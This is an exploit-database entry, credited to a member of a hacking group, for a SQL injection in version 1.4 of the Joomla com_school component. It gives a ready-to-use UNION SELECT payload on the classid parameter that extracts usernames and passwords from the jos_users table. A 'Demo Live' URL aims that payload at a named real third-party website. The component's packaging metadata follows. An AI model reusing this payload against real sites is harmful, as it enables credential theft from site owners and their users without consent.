Joomla Component com_school 1.4 (classid) SQL Injection Vulnerability

2009-06-08T00:00:00
ID 1337DAY-ID-5321
Type zdt
Reporter Chip D3 Bi0s
Modified 2009-06-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
Joomla Component com_school 1.4 (classid) SQL Injection Vulnerability
=====================================================================


----------------------------------------------------------------------
Joomla Component com_school (classid) SQL injection Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Group         :  LatinHackTeam
 [+] Vulnerability :  SQL injection
 ###################################################

________________________________________________________

Example:

 http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>

 <Sql Code>:
 -null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*
 

Demo Live:
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------


<name>school</name>
<creationDate>18 July 2006</creationDate>
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>
<copyright>
This component in released under the GNU/GPL License
</copyright>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.joomla.cl</authorUrl>
<version>1.4</version>



#  0day.today [2018-01-06]  #